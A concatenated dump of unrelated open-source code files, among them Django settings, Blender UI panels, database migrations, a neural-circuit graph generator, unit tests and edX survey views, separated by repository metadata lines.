EMAIL_HOST_PASSWORD = config('SENDGRID_PASSWORD')
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# Security
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
SECURE_SSL_REDIRECT = True
SESSION_COOKIE_SECURE = True
CSRF_COOKIE_SECURE = True
SECURE_HSTS_SECONDS = 3600
SECURE_HSTS_INCLUDE_SUBDOMAINS = True
SECURE_CONTENT_TYPE_NOSNIFF = True
SECURE_BROWSER_XSS_FILTER = True
X_FRAME_OPTIONS = 'DENY'
CSRF_COOKIE_HTTPONLY = True
# Webpack
WEBPACK_LOADER['DEFAULT']['CACHE'] = True
# Celery
CELERY_BROKER_URL = config('REDIS_URL')
CELERY_RESULT_BACKEND = config('REDIS_URL')
CELERY_SEND_TASK_ERROR_EMAILS = True
# Whitenoise
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
MIDDLEWARE.insert( # insert WhiteNoiseMiddleware right after SecurityMiddleware
MIDDLEWARE.index('django.middleware.security.SecurityMiddleware') + 1,
'whitenoise.middleware.WhiteNoiseMiddleware')
# django-log-request-id
MIDDLEWARE.insert( # insert RequestIDMiddleware on the top
0, 'log_request_id.middleware.RequestIDMiddleware')
LOG_REQUEST_ID_HEADER = 'HTTP_X_REQUEST_ID'
LOG_REQUESTS = True
# Opbeat
INSTALLED_APPS += ['opbeat.contrib.django']
MIDDLEWARE.insert( # insert OpbeatAPMMiddleware on the top
0, 'opbeat.contrib.django.middleware.OpbeatAPMMiddleware')
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
},
'request_id': {
'()': 'log_request_id.filters.RequestIDFilter'
},
},
'formatters': {
'standard': {
'format': '%(levelname)-8s [%(asctime)s] [%(request_id)s] %(name)s: %(message)s'
},
},
'handlers': {
'null': {
'class': 'logging.NullHandler',
},
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler',
'filters': ['require_debug_false'],
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'filters': ['request_id'],
'formatter': 'standard',
},
},
'loggers': {
'': {
'handlers': ['console'],
'level': 'INFO'
},
'django.security.DisallowedHost': {
'handlers': ['null'],
'propagate': False,
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
'log_request_id.middleware': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': False,
},
}
}
|
Swan/ManiaStarReducer
|
test/example.py
|
Python
|
mit
| 398
| 0.005025
|
import sys
sys.path.append("..")
from deflate import fix_star_rating
# The
|
beatmap that you are checking and fixing inflated patterns for
beatmap_path = "./necro.osu"
# The new difficulty name (Version) of the beatmap
new_difficulty_name = "star rating fix"
# The output file path of the beatmap
output
|
_path = "./necro_fixed.osu"
fix_star_rating(beatmap_path, new_difficulty_name, output_path)
|
PLyczkowski/Sticky-Keymap
|
2.74/scripts/startup/bl_ui/properties_data_armature.py
|
Python
|
gpl-2.0
| 10,538
| 0.001803
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
import bpy
from bpy.types import Panel, Menu
from rna_prop_ui import PropertyPanel
class ArmatureButtonsPanel:
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "data"
@classmethod
def poll(cls, context):
return context.armature
class DATA_PT_context_arm(ArmatureButtonsPanel, Panel):
bl_label = ""
bl_options = {'HIDE_HEADER'}
def draw(self, context):
layout = self.layout
ob = context.object
arm = context.armature
space = context.space_data
if ob:
layout.template_ID(ob, "data")
elif arm:
layout.template_ID(space, "pin_id")
class DATA_PT_skeleton(ArmatureButtonsPanel, Panel):
bl_label = "Skeleton"
def draw(self, context):
layout = self.layout
arm = context.armature
layout.prop(arm, "pose_position", expand=True)
col = layout.column()
col.label(text="Layers:")
col.prop(arm, "layers", text="")
col.label(text="Protected Layers:")
col.prop(arm, "layers_protected", text="")
if context.scene.render.engine == 'BLENDER_GAME':
col = layout.column()
col.label(text="Deform:")
col.prop(arm, "deform_method", expand=True)
class DATA_PT_display(ArmatureButtonsPanel, Panel):
bl_label = "Display"
def draw(self, context):
layout = self.layout
ob = context.object
arm = context.armature
layout.prop(arm, "draw_type", expand=True)
split = layout.split()
col = split.column()
col.prop(arm, "show_names", text="Names")
col.prop(arm, "show_axes", text="Axes")
col.prop(arm, "show_bone_custom_shapes", text="Shapes")
col = split.column()
col.prop(arm, "show_group_colors", text="Colors")
if ob:
col.prop(ob, "show_x_ray", text="X-Ray")
col.prop(arm, "use_deform_delay", text="Delay Refresh")
class DATA_PT_bone_group_specials(Menu):
bl_label = "Bone Group Specials"
def draw(self, context):
layout = self.layout
layout.operator("pose.group_sort", icon='SORTALPHA')
class DATA_PT_bone_groups(ArmatureButtonsPanel, Panel):
bl_label = "Bone Groups"
@classmethod
def poll(cls, context):
return (context.object and context.object.type == 'ARMATURE' and context.object.pose)
def draw(self, context):
layout = self.layout
ob = context.object
pose = ob.pose
group = pose.bone_groups.active
row = layout.row()
rows = 1
if group:
rows = 4
row.template_list("UI_UL_list", "bone_groups", pose, "bone_groups", pose.bone_groups, "active_index", rows=rows)
col = row.column(align=True)
col.active = (ob.proxy is None)
col.operator("pose.group_add", icon='ZOOMIN', text="")
col.operator("pose.group_remove", icon='ZOOMOUT', text="")
col.menu("DATA_PT_bone_group_specials", icon='DOWNARROW_HLT', text="")
if group:
col.separator()
col.operator("pose.group_move", icon='TRIA_UP', text="").direction = 'UP'
col.operator("pose.group_move", icon='TRIA_DOWN', text="").direction = 'DOWN'
split = layout.split()
split.active = (ob.proxy is None)
col = split.column()
col.prop(group, "color_set")
if group.color_set:
col = split.column()
sub = col.row(align=True)
sub.enabled = group.is_custom_color_set # only custom colors are editable
sub.prop(group.colors, "normal", text="")
sub.prop(group.colors, "select", text="")
sub.prop(group.colors, "active", text="")
row = layout.row()
row.active = (ob.proxy is None)
sub = row.row(align=True)
sub.operator("pose.group_assign", text="Assign")
sub.operator("pose.group_unassign", text="Remove") # row.operator("pose.bone_group_remove_from", text="Remove")
sub = row.row(align=True)
sub.operator("pose.group_select", text="Select")
sub.operator("pose.group_deselect", text="Deselect")
class DATA_PT_pose_library(ArmatureButtonsPanel, Panel):
bl_label = "Pose Library"
bl_options = {'DEFAULT_CLOSED'}
@classmethod
def poll(cls, context):
return (context.object and context.object.type == 'ARMATURE' and context.object.pose)
def draw(self, context):
layout = self.layout
ob = context.object
poselib = ob.pose_library
layout.template_ID(ob, "pose_library", new="poselib.new", unlink="poselib.unlink")
if poselib:
# list of poses in pose library
row = layout.row()
row.template_list("UI_UL_list", "pose_markers", poselib, "pose_markers",
poselib.pose_markers, "active_index", rows=3)
# column of operators for active pose
# - goes beside list
col = row.column(align=True)
col.active = (poselib.library is None)
# invoke should still be used for 'add', as it is
|
needed to allow
# add/replace options to be used properly
col.operator("poselib.pose_add", icon='ZOOMIN', text="")
col.operator_context = 'EXEC_DEFAULT' # exec not invoke, so that menu doesn't need showing
|
pose_marker_active = poselib.pose_markers.active
if pose_marker_active is not None:
col.operator("poselib.pose_remove", icon='ZOOMOUT', text="")
col.operator("poselib.apply_pose", icon='ZOOM_SELECTED', text="").pose_index = poselib.pose_markers.active_index
col.operator("poselib.action_sanitize", icon='HELP', text="") # XXX: put in menu?
# TODO: this panel will soon be deprecated too
class DATA_PT_ghost(ArmatureButtonsPanel, Panel):
bl_label = "Ghost"
def draw(self, context):
layout = self.layout
arm = context.armature
layout.prop(arm, "ghost_type", expand=True)
split = layout.split()
col = split.column(align=True)
if arm.ghost_type == 'RANGE':
col.prop(arm, "ghost_frame_start", text="Start")
col.prop(arm, "ghost_frame_end", text="End")
col.prop(arm, "ghost_size", text="Step")
elif arm.ghost_type == 'CURRENT_FRAME':
col.prop(arm, "ghost_step", text="Range")
col.prop(arm, "ghost_size", text="Step")
col = split.column()
col.label(text="Display:")
col.prop(arm, "show_only_ghost_selected", text="Selected Only")
class DATA_PT_iksolver_itasc(ArmatureButtonsPanel, Panel):
bl_label = "Inverse Kinematics"
bl_options = {'DEFAULT_CLOSED'}
@classmethod
def poll(cls, context):
ob = context.object
return (ob and ob.pose)
def draw(self, context):
layout = self.layout
ob = context.object
itasc = ob.pose.ik_param
layout.prop(ob.pose, "ik_solver")
if itasc:
layout.prop(itasc, "mode", expand=True)
simulation = (itasc.mode == 'SIMULATION')
if simulation:
layout.label(text="Reiteration:")
layout.prop(itasc, "reiteration_metho
|
google/tmppy
|
_py2tmp/unification/__init__.py
|
Python
|
apache-2.0
| 920
| 0
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ._exceptions
|
import (
UnificationAmbiguousException,
UnificationFailedException,
CanonicalizationFailedException)
from ._strategy import (
UnificationStrategy,
UnificationStrategyForCanonicalization,
TupleExpansion)
from ._unification import unify
from ._canonicalization
|
import canonicalize
|
bitmovin/bitcodin-python
|
bitcodin/test/input/testcase_create_input_incomplete_data.py
|
Python
|
unlicense
| 727
| 0
|
__author__ = 'Dominic Miglar <dominic.miglar@bitmovin.net>'
import unittest
from bitcodin import create_input
from bitcodin import Input
from bitcodin.exceptions import BitcodinBadRequestError
from bitcodin.test.bitcodin_test_case import BitcodinTestCase
class CreateInputIncompleteDataTestCase(BitcodinTestCase):
def setUp(se
|
lf):
super(CreateInputIncompleteDataTestCase, self).setUp()
self.inputUrl = ''
def runTest(self):
input = Input(self.inputUrl)
with self.assertRaises(BitcodinBadRequestError):
result = create_input(input)
def tearDown(self):
super(CreateInputIncompleteDataTestCase, self).tearDown()
if __name__ == '_
|
_main__':
unittest.main()
|
ikkebr/PyBozoCrack
|
docs/conf.py
|
Python
|
bsd-3-clause
| 8,453
| 0.005442
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# complexity documentation build configuration file, created by
# sphinx-qu
|
ickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated fil
|
e.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import pybozocrack
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'PyBozoCrack'
copyright = u'2014, Henrique Pereira'
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = pybozocrack.__version__
# The full version, including alpha/beta/rc tags.
release = pybozocrack.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'pybozocrackdoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'pybozocrack.tex',
u'PyBozoCrack Documentation',
u'Henrique Pereira', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'pybozocrack',
u'PyBozoCrack Documentation',
[u'Henrique Pereira'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'pybozocrack',
u'PyBozoCrack Documentation',
u'Henrique Pereira',
'pybozocrack',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices
|
tiborsimko/invenio-oauthclient
|
invenio_oauthclient/alembic/97bbc733896c_create_oauthclient_tables.py
|
Python
|
mit
| 2,898
| 0
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2016-2018 CERN.
#
# Inve
|
nio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Create oauthclient tables."""
import sqlalchemy as sa
import sqlalchemy_utils
from alembic import op
from sqlalchemy.engin
|
e.reflection import Inspector
# revision identifiers, used by Alembic.
revision = '97bbc733896c'
down_revision = '44ab9963e8cf'
branch_labels = ()
depends_on = '9848d0149abd'
def upgrade():
"""Upgrade database."""
op.create_table(
'oauthclient_remoteaccount',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('client_id', sa.String(length=255), nullable=False),
sa.Column(
'extra_data',
sqlalchemy_utils.JSONType(),
nullable=False),
sa.ForeignKeyConstraint(['user_id'], [u'accounts_user.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('user_id', 'client_id')
)
op.create_table(
'oauthclient_useridentity',
sa.Column('id', sa.String(length=255), nullable=False),
sa.Column('method', sa.String(length=255), nullable=False),
sa.Column('id_user', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['id_user'], [u'accounts_user.id'], ),
sa.PrimaryKeyConstraint('id', 'method')
)
op.create_index(
'useridentity_id_user_method', 'oauthclient_useridentity',
['id_user', 'method'], unique=True
)
op.create_table(
'oauthclient_remotetoken',
sa.Column('id_remote_account', sa.Integer(), nullable=False),
sa.Column('token_type', sa.String(length=40), nullable=False),
sa.Column(
'access_token',
sqlalchemy_utils.EncryptedType(),
nullable=False),
sa.Column('secret', sa.Text(), nullable=False),
sa.ForeignKeyConstraint(
['id_remote_account'], [u'oauthclient_remoteaccount.id'],
name='fk_oauthclient_remote_token_remote_account'
),
sa.PrimaryKeyConstraint('id_remote_account', 'token_type')
)
def downgrade():
"""Downgrade database."""
ctx = op.get_context()
insp = Inspector.from_engine(ctx.connection.engine)
op.drop_table('oauthclient_remotetoken')
for fk in insp.get_foreign_keys('oauthclient_useridentity'):
if fk['referred_table'] == 'accounts_user':
op.drop_constraint(
op.f(fk['name']),
'oauthclient_useridentity',
type_='foreignkey'
)
op.drop_index(
'useridentity_id_user_method',
table_name='oauthclient_useridentity')
op.drop_table('oauthclient_useridentity')
op.drop_table('oauthclient_remoteaccount')
|
AdamRTomkins/Neurokernel-singularity-container
|
examples/data/gen_generic_lpu.py
|
Python
|
apache-2.0
| 12,988
| 0.004312
|
#!/usr/bin/env python
"""
Create generic LPU and simple pulse input signal.
"""
from itertools import product
import sys
import numpy as np
import h5py
import networkx as nx
def create_lpu_graph(lpu_name, N_sensory, N_local, N_proj):
"""
Create a generic LPU graph.
Creates a graph containing the neuron and synapse parameters for an LPU
containing the specified number of local and projection neurons. The graph
also contains the parameters for a set of sensory neurons that accept
external input. All neurons are either spiking or graded potential neurons;
the Leaky Integrate-and-Fire model is used for the former, while the
Morris-Lecar model is used for the latter (i.e., the neuron's membrane
potential is deemed to be its output rather than the time when it emits an
action potential). Synapses use either the alpha function model or a
conductance-based model.
Parameters
----------
lpu_name : str
Name of LPU. Used in port identifiers.
N_sensory : int
Number of sensory neurons.
N_local : int
Number of local neurons.
N_proj : int
Number of project neurons.
Returns
-------
g : networkx.MultiDiGraph
Generated graph.
"""
# Set numbers of neurons:
neu_type = ('sensory', 'local', 'proj')
neu_num = (N_sensory, N_local, N_proj)
# Neuron ids are between 0 and the total number of neurons:
G = nx.MultiDiGraph()
in_port_idx = 0
spk_out_id = 0
gpot_out_id = 0
for (t, n) in zip(neu_type, neu_num):
for i in range(n):
id = t+"_"+str(i)
name = t+"_"+str(i)
# Half of the sensory neurons and projection neurons are
# spiking neurons. The other half are graded potential neurons.
# All local neurons are graded potential only.
if t != 'local' and np.random.rand() < 0.5:
|
G.add_node(id,
{'class': 'LeakyIAF',
'name': name+'_s',
'initV': np.rando
|
m.uniform(-60.0,-25.0),
'reset_potential': -67.5489770451,
'resting_potential': 0.0,
'threshold': -25.1355161007,
'resistance': 1002.445570216,
'capacitance': 0.0669810502993,
'circuit': 'proj' if t == 'proj' else 'local'
})
# Projection neurons are all assumed to be attached to output
# ports (which are represented as separate nodes):
if t == 'proj':
G.add_node(id+'_port',
{'class': 'Port',
'name': name+'port',
'port_type': 'spike',
'port_io': 'out',
'selector': '/%s/out/spk/%s' % (lpu_name, str(spk_out_id))
})
G.add_edge(id, id+'_port')
spk_out_id += 1
else:
# An input port node is created for and attached to each non-projection
# neuron with a synapse; this assumes that data propagates from one LPU to
# another as follows:
# LPU0[projection neuron] -> LPU0[output port] -> LPU1[input port] ->
# LPU1[synapse] -> LPU1[non-projection neuron]
G.add_node('in_port'+str(in_port_idx),
{'class': 'Port',
'name': 'in_port'+str(in_port_idx),
'port_type': 'spike',
'port_io': 'in',
'selector': '/%s/in/spk/%s' % (lpu_name, in_port_idx)
})
G.add_node('synapse_'+'in_port'+str(in_port_idx)+'_to_'+id,
{'class': 'AlphaSynapse',
'name': 'in_port'+str(in_port_idx)+'-'+name,
'ad': 0.19*1000,
'ar': 1.1*100,
'gmax': 0.003*1e-3,
'reverse': 65.0,
'circuit': 'local'
})
G.add_edge('in_port'+str(in_port_idx),
'synapse_'+'in_port'+str(in_port_idx)+'_to_'+id)
G.add_edge('synapse_'+'in_port'+str(in_port_idx)+'_to_'+id,
id)
in_port_idx += 1
else:
G.add_node(id,
{'class': "MorrisLecar",
'name': name+'_g',
'V1': 30.,
'V2': 15.,
'V3': 0.,
'V4': 30.,
'phi': 0.025,
'offset': 0.,
'V_L': -50.,
'V_Ca': 100.0,
'V_K': -70.0,
'g_Ca': 1.1,
'g_K': 2.0,
'g_L': 0.5,
'initV': -52.14,
'initn': 0.02,
'circuit': 'proj' if t == 'proj' else 'local'
})
# Projection neurons are all assumed to be attached to output
# ports (which are not represented as separate nodes):
if t == 'proj':
G.add_node(id+'_port',
{'class': 'Port',
'name': name+'port',
'port_type': 'gpot',
'port_io': 'out',
'selector': '/%s/out/gpot/%s' % (lpu_name, str(gpot_out_id))
})
G.add_edge(id, id+'_port')
gpot_out_id += 1
else:
G.add_node('in_port'+str(in_port_idx),
{'class': 'Port',
'name': 'in_port'+str(in_port_idx),
'port_type': 'gpot',
'port_io': 'in',
'selector': '/%s/in/gpot/%s' % (lpu_name, in_port_idx)
})
G.add_node('synapse_'+'in_port'+str(in_port_idx)+'_to_'+id,
{'class': 'PowerGPotGPot',
'name': 'in_port'+str(in_port_idx)+'-'+name,
'reverse': -80.0,
'saturation': 0.03*1e-3,
'slope': 0.8*1e-6,
'power': 1.0,
'threshold': -50.0,
'circuit': 'local'
})
G.add_edge('in_port'+str(in_port_idx),
'synapse_'+'in_port'+str(in_port_idx)+'_to_'+id,
delay = 0.001)
G.add_edge('synapse_'+'in_port'+str(in_port_idx)+'_to_'+id,
id)
in_port_idx += 1
# Assume a probability of synapse existence for each group of synapses:
# sensory -> local, sensory -> projection, local -> projection,
# projection -> local:
for r, (i, j) in zip((0.5, 0.1, 0.1, 0.3),
((0, 1), (0, 2), (1, 2), (2, 1))):
for src, tar in product(range(neu_num[i]), range(neu_num[j])):
# Don't connect all neurons:
if np.random.rand() > r: continue
# Connections from the sensory neurons use the alpha function model;
# all other connections use the power_gpot_gpot model:
pre_id = neu_type[i]+"_"+str(src)
|
dextervip/rpv
|
GerenDisponibilidade/professor/urls.py
|
Python
|
gpl-3.0
| 1,015
| 0.009852
|
from django.conf.urls.defaults import patterns, url, include
urlpatterns = patterns('professor.views',
url(r'^$', 'home', name='home'),
url(r'^adicionar-compromisso$', 'adicionarCompromisso', name='adicionarCompromisso'),
url(r'^
|
visualizar-compromisso/(?P<id>\d{1,10})$', 'visualizarCompromisso', name='visualizarCompromisso'),
url(r'^editar-compromisso/(?P<id>\d{1,10})$', 'editarCompromisso', name='editarCompromisso'),
url(r'^excluir-compromisso/(?P<id>\d{1,10})$', 'excluirCompromisso', name='excluirCompromisso'),
url(r'^get-compromissos$', 'getCompromissos', name='getCompromissos'),
url(r'^d
|
isponibilidadeAula$', 'disponibilidadeAula', name='disponibilidadeAula'),
url(r'^informarInteresseDisciplina$', 'informarInteresseDisciplina', name='informarInteresseDisciplina'),
url(r'^getInteressesDisciplina$', 'getInteressesDisciplina', name='getInteressesDisciplina'),
url(r'^getDisponibilidadeAula$', 'getDisponibilidadeAula', name='getDisponibilidadeAula'),
)
|
fbouliane/ddns-updater-aws
|
setup.py
|
Python
|
mit
| 1,053
| 0
|
from distutils.core import setup
from setuptools import find_packages
setup(name='ddns_updater_aws',
version='0.1',
|
author='Felix Bouliane',
license='MIT',
py_modules=[],
packages=find_packages(exclude=['contrib', 'docs', 'test']),
url='https://github.com/fbouliane/ddns-updater-aws',
classifiers=[
'Development Status :: 3 - Alpha',
|
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Topic :: Internet',
'Topic :: Internet :: Name Service (DNS)'
],
keywords='DNS, Dynamic DNS, fixed ip, route53, AWS, Amazon Web Services',
install_requires=[
'dnspython>=1.12.0,<2.0',
'ipaddress>=1.0.16,<2.0',
'route53>=1.0,<2.0',
'configparser>=3.3,<4.0'
],
entry_points={
'console_scripts': [
'ddns-updater-aws = ddns_updater_aws.__main__:main',
]
}
)
|
rickerc/cinder_audit
|
cinder/tests/db/test_name_id.py
|
Python
|
apache-2.0
| 2,344
| 0
|
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for volume name_id."""
from oslo.config import cfg
from cinder import context
|
from cinder import db
from cinder import test
from cinder.tests import utils as testutils
CONF = cfg.CONF
class NameIDsTestCase(test.TestCase):
"""Test cases for naming volumes with name_id."""
def setUp(self):
super(NameIDsTestCase, self).setUp()
self.ctxt = context.RequestContext(user_id='user_id',
project_id='project_id')
def tearDown(self):
super(NameIDsTestCase, self).tearDown()
def test_name_id_same(self)
|
:
"""New volume should have same 'id' and 'name_id'."""
vol_ref = testutils.create_volume(self.ctxt, size=1)
self.assertEqual(vol_ref['name_id'], vol_ref['id'])
expected_name = CONF.volume_name_template % vol_ref['id']
self.assertEqual(vol_ref['name'], expected_name)
def test_name_id_diff(self):
"""Change name ID to mimic volume after migration."""
vol_ref = testutils.create_volume(self.ctxt, size=1)
db.volume_update(self.ctxt, vol_ref['id'], {'name_id': 'fake'})
vol_ref = db.volume_get(self.ctxt, vol_ref['id'])
expected_name = CONF.volume_name_template % 'fake'
self.assertEqual(vol_ref['name'], expected_name)
def test_name_id_snapshot_volume_name(self):
"""Make sure snapshot['volume_name'] is updated."""
vol_ref = testutils.create_volume(self.ctxt, size=1)
db.volume_update(self.ctxt, vol_ref['id'], {'name_id': 'fake'})
snap_ref = testutils.create_snapshot(self.ctxt, vol_ref['id'])
expected_name = CONF.volume_name_template % 'fake'
self.assertEqual(snap_ref['volume_name'], expected_name)
|
xingyepei/edx-platform
|
lms/djangoapps/survey/views.py
|
Python
|
agpl-3.0
| 4,127
| 0.002908
|
"""
View endpoints for Survey
"""
import logging
import json
from django.contrib.auth.decorators import login_required
from django.http import (
HttpResponse, HttpResponseRedirect, HttpResponseNotFound
)
from django.core.urlresolvers import reverse
from django.views.decorators.http import require_POST
from django.conf import settings
from django.utils.html import escape
from opaque_keys.edx.keys import CourseKey
from edxmako.shortcuts import render_to_response
from survey.models import SurveyForm
from microsite_configuration import microsite
log = logging.getLogger("edx.survey")
@login_required
def view_survey(request, survey_name):
"""
View to render the survey to the end user
"""
redirect_url = request.GET.get('redirect_url')
return view_student_survey(request.user, survey_name, redirect_url=redirect_url)
def view_student_survey(user, survey_name, course=None, redirect_url=None, is_required=False, skip_redirect_url=None):
"""
Shared utility method to render a survey form
NOTE: This method is shared between the Survey and Courseware Djangoapps
"""
redirect_url = redirect_url if redirect_url else reverse('dashboard')
dashboard_redirect_url = reverse('dashboard')
skip_redirect_url = skip_redirect_url if skip_redirect_url else dashboard_redirect_url
survey = SurveyForm.get(survey_name, throw_if_not_found=False)
if not survey:
return HttpResponseRedirect(redirect_url)
# the result set from get_answers, has an outer key with the user_id
# just remove that outer key to make the JSON payload simplier
existing_answers = survey.get_answers(user=user).get(user.id, {})
platform_name = microsite.get_value('platform_name', settings.PLATFORM_NAME)
context = {
'existing_data_json': json.dumps(existing_answers),
'postback_url': reverse('submit_answers', args=[survey_name]),
'redirect_url': redirect_url,
'skip_redirect_url': skip_redirect_url,
'dashboard_redirect_url': dashboard_redirect_url,
'survey_form': survey.form,
'is_required': is_required,
'mail_to_link': microsite.get_value('email_from_address', settings.CONTACT_EMAIL),
'platform_name': platform_name,
'course': course,
}
return render_to_response("survey/survey.html", context)
@require_POST
@login_required
def submit_answers(request, survey_name):
"""
